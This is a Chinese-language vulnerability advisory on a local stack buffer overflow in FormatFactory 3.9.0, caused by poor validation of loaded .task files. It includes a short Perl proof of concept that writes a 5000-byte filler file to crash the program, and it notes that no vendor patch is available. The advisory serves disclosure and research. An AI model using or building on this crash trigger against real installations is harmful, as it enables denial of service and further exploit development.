FormatFactory本地栈溢出漏洞
发布日期:2016-09-01
更新日期:2016-09-05
受影响系统:
描述:
FormatFactory是音频、视频、图形文件类型转换软件。
FormatFactory 3.9.0版本存在本地栈缓冲区溢出漏洞。加载文件(.task)中的错误验证检查导致栈溢出,可使受影响程序崩溃。
<*来源:ZwX
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
ZwX ()提供了如下测试方法:
Exploit Code (Perl)
#!/usr/bin/perl
my $Buff = "x41" x 5000;
open(MYFILE,'>>FormatFactory.task');
print MYFILE $Buff;
close(MYFILE);
print "PoC by ZwX";
建议:
厂商补丁:
FormatFactory
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: